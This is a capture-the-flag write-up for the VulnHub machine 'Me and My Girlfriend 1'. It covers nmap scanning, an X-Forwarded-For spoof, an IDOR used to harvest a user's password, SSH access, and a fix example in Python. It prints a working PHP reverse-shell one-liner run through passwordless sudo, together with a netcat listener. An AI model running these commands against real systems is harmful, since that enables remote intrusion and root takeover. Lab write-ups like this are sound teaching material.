Hello Everyone, let's begin
CTF link: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
Download link: https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova
I opened it in VirtualBox with a bridged network.
CTF level: Beginner
Vulnerabilities to exploit: X-Forwarded-For header trust, IDOR, sudo permission with no password
Techniques and tools: Nmap, Firefox, Header Editor, terminal, ssh, PHP socket, netcat
It started with the CTF description:

I noticed that "Alice" is the clue to begin with.
After starting the machine, I found its IP address using
sudo arp-scan --local

The CTF machine's IP was 192.168.0.184.
I scanned the 1000 most common ports with service/version detection using nmap:
sudo nmap -sSV 192.168.0.184

Two services were running on the CTF machine:
22/tcp Openssh 6.6.1p1
80/tcp Apache httpd 2.47
I also tried nmap --script vuln 192.168.0.184, but found nothing useful.
Since port 80 was open, I opened the HTTP service in Firefox. The page says there is something that can only be accessed from the local machine.
But the page source revealed more.
An HTML comment hints at using the X-Forwarded-For header. To set the header I used the Header Editor Firefox extension and added a new rule; now the restricted content is reachable from my machine.
After adding the custom header, I refreshed the page and saw Login and Register options. I registered and logged in with the same credentials. Clicking the Profile option, I found something interesting in the URL: http://192.168.0.184/index.php?page=profile&user_id=15 . Changing user_id shows other users' accounts too: it's an IDOR. I kept fuzzing until I reached Alice's account (user_id=5).
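To show why the header bypass and the IDOR above work, and what closing them looks like, here is an added example that is not the CTF app's code: a language-neutral Python stand-in for the PHP app's checks, with the vulnerable logic next to a hardened version. The trusted-proxy range, header values and user ids are constructed for the demo, and the function names are hypothetical.

```python
# Added example (not the CTF app's code): the two web flaws from this write-up,
# each in its vulnerable form next to a hardened one. The app on the CTF box
# is PHP; this is a Python stand-in, and the proxy range, header values and
# user ids are constructed for the demo.
from ipaddress import ip_address, ip_network

# Assumed: reverse proxies we operate live in this range (constructed value).
TRUSTED_PROXIES = [ip_network("10.0.0.0/8")]
LOCAL_NETS = [ip_network("127.0.0.0/8"), ip_network("::1/128")]

def _in_any(addr: str, nets) -> bool:
    try:
        ip = ip_address(addr)
    except ValueError:          # garbage in a header is never trusted or local
        return False
    return any(ip in net for net in nets)

def client_ip_vulnerable(remote_addr: str, headers: dict) -> str:
    # What the CTF page does: believe X-Forwarded-For unconditionally, so any
    # visitor becomes "local" by adding one header in a browser extension.
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else remote_addr

def client_ip_hardened(remote_addr: str, headers: dict) -> str:
    # Honour X-Forwarded-For only when the TCP peer is a proxy we operate, and
    # walk the chain from the right: the first hop that is not one of our
    # proxies is the real client, so entries prepended by the client are ignored.
    if not _in_any(remote_addr, TRUSTED_PROXIES):
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not _in_any(hop, TRUSTED_PROXIES):
            return hop
    return remote_addr          # header absent, or only our own proxies listed

def is_local(addr: str) -> bool:
    return _in_any(addr, LOCAL_NETS)

def can_view_profile(session_user_id: int, requested_user_id: int, is_admin: bool = False) -> bool:
    # IDOR fix for ?page=profile&user_id=N: the id from the URL must match the
    # authenticated session, or the caller must hold an explicit privilege.
    return is_admin or session_user_id == requested_user_id

if __name__ == "__main__":
    spoof = {"X-Forwarded-For": "127.0.0.1"}
    print(is_local(client_ip_vulnerable("192.168.0.111", spoof)))  # True: bypassed
    print(is_local(client_ip_hardened("192.168.0.111", spoof)))    # False
    print(can_view_profile(15, 5))                                  # False
```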
Using Inspect Element, I was able to see the password. I took the username and password and tried my luck with SSH:
ssh alice@192.168.0.184
Huh, that was easy. Now it's time to look for flags and escalate privileges. I prefer to escalate privileges first.
I started by checking id, groups and sudo permissions:
id
groups
sudo -l
I found that Alice can run php as root without a password.
First I started a netcat listener on my machine on port 1234 (the same port the PHP socket will connect back to):
nc -lvp 1234

Then, from Alice's SSH session on the CTF machine, I used a PHP socket to connect back:
Note: replace 192.168.0.111 with your own machine's IP address.
sudo php -r '$sock=fsockopen("192.168.0.111",1234);exec("/bin/bash -i <&3 >&3 2>&3");'

Finally, I got root access.
I used find to locate the flags (I knew the flag names):
find / -name flag1.txt
find / -name flag2.txt

Using cat, I read both flags.
Thank you